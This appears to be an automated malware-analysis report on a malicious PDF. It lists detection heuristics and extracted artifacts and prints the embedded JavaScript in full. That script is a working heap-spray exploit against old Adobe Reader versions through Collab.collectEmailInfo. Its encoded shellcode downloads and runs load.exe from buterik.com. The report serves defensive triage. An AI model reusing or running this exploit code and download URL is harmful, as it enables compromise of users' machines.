MALICIOUS
250
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains embedded and obfuscated JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT, PDF_JS, and PDF_UNESCAPE. The script, identified as javascript_obj0013_001.js, likely attempts to download and execute a second-stage payload. The presence of the unescape() function suggests an attempt to deobfuscate malicious code. Due to the obfuscation, the exact payload and delivery mechanism cannot be fully determined.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 7
-
JavaScript action low 4 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Obfuscated multi-stage PDF JavaScript heap-spray exploit critical PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAYPDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
var gtJaJ4DZp = 0x0c0c0c0c; var vsM15 = unescape("%u9090%u9090%u9090%u0FEB%u335B%u66C9%u80B9%u8001%u1133%uE243%uEBFA%uE805%uFFEC%uFFFF%u7581%u21B0%u1111%u9A11%u1D51%u619A%uBC0D%u619A%u9019%u11FD%u1115%u9A11%u47FD%u9F79%u1F5F%uF9FD%u11EF%u1111%u5498%u4715%u8979%u9BEF%uF91F%u11E1%u1111%u5498%u4719%u3479%uEEA1%uF9D3%u11F3%u1111%u5498%u471D%uFE79%uF1DF%uF971%u11C5%u1111%u5498%u4701%uD079%uF468%uF9A9%u11D7%u1111%u5498%u5105%u2991%u64D2%u98EB%u0954%u16F8%u1110%u4F11%u6498%u9A35%u1554%u107B%u9A48%u0944%uF947%u119A%u1111%u7941% … var ntMEmfp6j4fZg = 0x400000; -
PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URLDecoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://buterik.com/123/load.exe Referenced by PDF JavaScript
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0013_001.js |
pdf-javascript-stream | PDF /JS object 13 at offset 0x36A | 2916 bytes |
SHA-256: 91143bc2adf582cec760b0b6b52cfcbb4c2ec82bf325ca21351ff95ba66f4aa5 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 3 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function ezet093EavXm() { var rRq3mFFJNApj = new Array();
function ZpE72z7gsFou(Vp2BPjdGm, O3iuCYd3LT) {
while (Vp2BPjdGm.length*2<O3iuCYd3LT){Vp2BPjdGm += Vp2BPjdGm;}
Vp2BPjdGm = Vp2BPjdGm.substring(0,O3iuCYd3LT/2);
return Vp2BPjdGm;
}
function PVGYB0n14() {
var gtJaJ4DZp = 0x0c0c0c0c;
var vsM15 = unescape("%u9090%u9090%u9090%u0FEB%u335B%u66C9%u80B9%u8001%u1133%uE243%uEBFA%uE805%uFFEC%uFFFF%u7581%u21B0%u1111%u9A11%u1D51%u619A%uBC0D%u619A%u9019%u11FD%u1115%u9A11%u47FD%u9F79%u1F5F%uF9FD%u11EF%u1111%u5498%u4715%u8979%u9BEF%uF91F%u11E1%u1111%u5498%u4719%u3479%uEEA1%uF9D3%u11F3%u1111%u5498%u471D%uFE79%uF1DF%uF971%u11C5%u1111%u5498%u4701%uD079%uF468%uF9A9%u11D7%u1111%u5498%u5105%u2991%u64D2%u98EB%u0954%u16F8%u1110%u4F11%u6498%u9A35%u1554%u107B%u9A48%u0944%uF947%u119A%u1111%u7941%u0B27%u613E%u86F9%u1111%u9811%u0D54%uD49A%uD192%u9841%u3154%uEE79%u1111%u4111%u549A%u7B05%u4813%u449A%uF909%u1170%u1111%u5412%uD631%u4D11%u3F6F%uD674%u1551%u7469%u1111%u64EE%u9A31%u1D54%u107B%u9A48%u0944%u51F9%u1111%u7B11%u4916%u5412%u2235%u42CA%uEE42%u3164%u4241%u549A%u7B0D%u4814%u449A%uF909%u1132%u1111%u117B%u64EE%u9A31%u1954%u137B%u9A48%u0944%u01F9%u1111%u7B11%u9AEE%u0154%u107B%u9A48%u0944%u11F9%u1111%u5011%u434A%uF012%uF012%uF012%uF012%uFD92%u4B15%u9A42%uF3CB%u43E6%uF1EE%u9A44%u9AFD%u196C%u4C9A%u471D%u629A%u9A2D%u0F65%u1269%u47E2%u679A%u1231%u22E2%u58D8%uBC50%uD212%u2247%u1EE7%u01AF%uE32B%u1965%uDFD0%u121C%u51E3%uE0FA%uEF2A%u644F%u4BF4%uFA9A%u4B9A%u1235%u77CC%u1D9A%u9A5A%u0D4B%uCC12%u159A%u129A%u4FD4%uD34C%u1119%uE5F9%uEEEF%u44EE%u5D43%u5E5C%u115F%u7468%u7074%u2F3A%u622F%u7475%u7265%u6B69%u632E%u6D6F%u312F%u3332%u6C2F%u616F%u2E64%u7865%u0065");
var ntMEmfp6j4fZg = 0x400000;
var C3lWxPeDW = vsM15.length * 2;
var O3iuCYd3LT = ntMEmfp6j4fZg - (C3lWxPeDW+0x38);
var Vp2BPjdGm = unescape("%u9090%u9090");
Vp2BPjdGm = ZpE72z7gsFou(Vp2BPjdGm, O3iuCYd3LT);
var RAjByYFnRb3EHr = (gtJaJ4DZp - 0x400000)/ntMEmfp6j4fZg;
for (var D8G8PidgGop=0;D8G8PidgGop<RAjByYFnRb3EHr;D8G8PidgGop++) {
rRq3mFFJNApj[D8G8PidgGop] = Vp2BPjdGm + vsM15;
}
}
function nuzab() {
var wdWYb = app.viewerVersion.toString();
wdWYb = wdWYb.replace(/\D/g,"");
var woSFkcy = new Array(wdWYb.charAt(0),wdWYb.charAt(1),wdWYb.charAt(2));
var h5kUtDk = "c8o8l5l555e2c424t234534E6ma45678il31In1f3457o";
if ((woSFkcy[0] == 8 &&
((woSFkcy[1] == 1 && woSFkcy[2] < 2) || woSFkcy[1] < 1)) ||
(woSFkcy[0] == 7 && woSFkcy[1] < 1) ||
(woSFkcy[0] < 7)) {
var qXhpIjT = Collab;
PVGYB0n14();
var FXCPzoRD6JY = unescape("%u0c0c%u0c0c");
var BiaSGmrFaJTgc = "c24ol2la572bS8to2445r5e00";
while(FXCPzoRD6JY.length < 44952) FXCPzoRD6JY += FXCPzoRD6JY;
this[BiaSGmrFaJTgc.replace(new RegExp(/\d/g),"")] = qXhpIjT[h5kUtDk.replace(new RegExp(/\d/g),"")]( {subj: "", msg: FXCPzoRD6JY});
}
}
nuzab();}
|
|||
javascript_obj0013_001_shellcode_00.bin |
pdf-js-shellcode | pdf-js-unescape-shellcode recovered from PDF /JS object 13 at offset 0x36A | 444 bytes |
SHA-256: bcb2470f54ff4d180f2f1d8ee994554fbbb7541e67bae743de98e7713ac34a25 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.